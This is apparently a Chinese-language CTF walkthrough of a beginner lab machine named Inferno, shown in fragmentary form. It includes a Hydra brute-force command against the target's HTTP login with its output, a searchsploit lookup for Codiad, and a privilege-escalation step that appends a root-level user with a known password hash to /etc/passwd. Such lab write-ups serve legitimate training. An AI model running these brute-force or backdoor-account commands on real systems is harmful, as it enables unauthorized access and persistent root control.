难度: medium 描述:现实生活中的机器 + CTF。该机器被设计为现实生活(也许不是?),非常适合刚开始渗透测试的新手
基本信息
🚀
本地机器信息
目标机器信息
IP
10.17.5.121
10.10.232.226
OS
kali
linux
信息搜集
端口扫描
需要登录凭证
1 2 3 4 5 6 7 8 9 10
┌──(leo㉿HACK)-[~/SecLab/inferno] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.232.226 http- get /inferno Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-01 15:01:44 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-get://10.10.232.226:80/inferno [STATUS] 1341.00 tries/min, 1341 tries in 00:01h, 14343057 to do in 178:16h, 16 active [STATUS] 1410.00 tries/min, 4230 tries in 00:03h, 14340168 to do in 169:31h, 16 active
攻击向量
1
searchsploit codiad
漏洞利用
您会注意到有一个 cronjob 每分钟都会让您注销,因此您必须快点。
获取到密钥
尝试ssh登录
让我们利用这一点来生成一个特权用户:
提权
1
openssl passwd -1 -salt "test" "test"
1
echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd
